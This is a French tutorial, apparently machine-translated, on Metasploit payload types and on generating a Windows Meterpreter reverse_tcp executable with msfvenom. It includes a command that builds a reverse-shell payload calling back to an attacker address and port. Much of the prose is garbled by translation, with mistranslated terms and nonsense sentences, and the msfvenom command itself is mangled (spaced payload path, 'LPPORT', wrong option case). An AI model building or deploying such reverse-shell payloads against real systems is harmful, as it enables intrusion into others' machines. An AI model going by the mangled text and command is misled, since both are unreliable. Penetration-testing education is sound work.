Metasploit est l'une des plateformes les plus utilisées pour effectuer des tests de pénétration, un piratage et même des jeux informels. Nous devons comprendre comment les composants et les charges utiles fonctionnent pour les utiliser efficacement. En termes simplistes, une charge utile est une action qui doit être exécutée lorsqu'un exploit a terminé son exécution. Une charge utile fait partie du code que l'exploit exécute. Les exploits sont utilisés pour accéder à un système et les charges utiles effectuent des tâches spécifiques. Metasploit a de nombreuses charges utiles, telles que les coquilles inversées, les coquilles de liais, Meterpreter et autres. Plusieurs charges utiles fonctionneront avec le plus d'exploits; Cependant, trouver la charge utile appropriée qui fonctionnera avec l'exploit nécessite une enquête. Une fois que vous avez décidé d'un exploit, utilisez la commande «Afficher les charges utiles» de Metaspoit pour obtenir une liste de charges utiles qui fonctionneront avec.
Types de charges utiles
Dans Metasploit, il existe plusieurs types de charges utiles. Ces trois types de base sont ceux que vous finirez par finir en utilisant le plus:
Simple
Les célibataires sont extrêmement petits et destinés à initier une conversation avant de passer à une autre étape.
Stagers
La charge utile utilise le Stager pour établir une connexion réseau entre le système cible et le processeur de charge utile du serveur Metasploit. Le Stager vous permet de charger et d'insérer une charge utile plus grande et plus compliquée appelée étape en utilisant une charge utile plus petite.
Mètre
Meterpreter est devenu une charge utile d'attaque Metasploit qui donne un facteur d'intrus qui affecte la façon de parcourir et d'exécuter du code sur la machine cible. MeterPreter est une application à mémoire de mémoire qui n'écrit pas au disque. Meterpreter a essayé de s'injecter sur le processus attaqué, d'où il peut passer à d'autres processus d'exploitation; Par conséquent, aucun nouveau processus n'est généré. Meterpreter a été créé pour éviter les inconvénients de l'utilisation de charges utiles spécialisées tout en permettant l'écriture de commandement et assurer la communication cryptée. L'inconvénient de l'utilisation de charges utiles spécifiques est que des alarmes peuvent être augmentées si un processus plus récent commence dans le système cible.
Création de la charge utile avec Metasploit à Kali Linux
Pour créer une charge utile avec Metasploit dans Kali Linux, suivez toutes les étapes décrites ci-dessous:
Étape 1: Accès à Msfconsole
Msfconsole est le seul moyen d'accès à la majorité de la fonctionnalité de Metasploit. msfconsole donne à la plate-forme une interface basée sur la console. Msfconsole a été l'interface MSF avec les plus grandes fonctionnalités et est la plus stable. La capacité de lecture complète, l'onglet et l'achèvement des commandes sont tous fournis par Msfconsole. Les commandes externes peuvent être exécutées à partir du msfconsole. Utilisez la commande indiquée suivante pour accéder à msfconsole sur Kali Linux.
$ msfconsole
Étape 2: Accès à MSFvenom
La charge utile que nous fabriquons en utilisant MSFvenom sera une charge utile TCP inversée. Cette charge utile crée un exécutable qui, au début, établit une connexion entre l'ordinateur de l'utilisateur et notre gestionnaire Metasploit, nous permettant de mener une session de mètre. Utilisez la commande indiquée suivante pour accéder à MSFvenom sur Kali Linux.
$ msfvenom -p
Étape 3: Création de la charge utile
Utilisez la commande indiquée suivante pour créer une charge utile dans Metasploit sur Kali Linux.
$ msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.43.28 LPPORT = 6001 -F EXE -O charge utile.exe
Vous pouvez utiliser l'option -p pour indiquer la charge utile que vous souhaitez utiliser. LHOST semble être l'adresse IP de l'attaquant à laquelle vous souhaitez que la charge utile se lie. LPPORT est le même que ci-dessus; C'est le port auquel la charge utile liera, et il doit être configuré dans le gestionnaire. -f Instruts msfvenom Comment générer la charge utile; Dans ce cas, nous allons pour un programme exécutable ou exe. La charge utile créée par l'exécution de la commande ci-dessus est de 73802 octets, comme le montre l'image ci-dessus.
Pour vérifier où il a été créé, nous naviguerons vers le répertoire domestique. À partir de la capture d'écran ci-dessous, vous pouvez vérifier cette charge utile.EXE a été créé avec succès.
Vous pouvez vérifier ses propriétés en double-cliquez dessus. La taille de la charge utile créée est la même que celle montrée sur l'écran du terminal.
Conclusion
Cet article a fourni une brève introduction liée aux charges utiles et à leurs types. Nous avons suivi les instructions étape par étape pour créer des charges utiles dans Metasploit dans le système d'exploitation Kali Linux.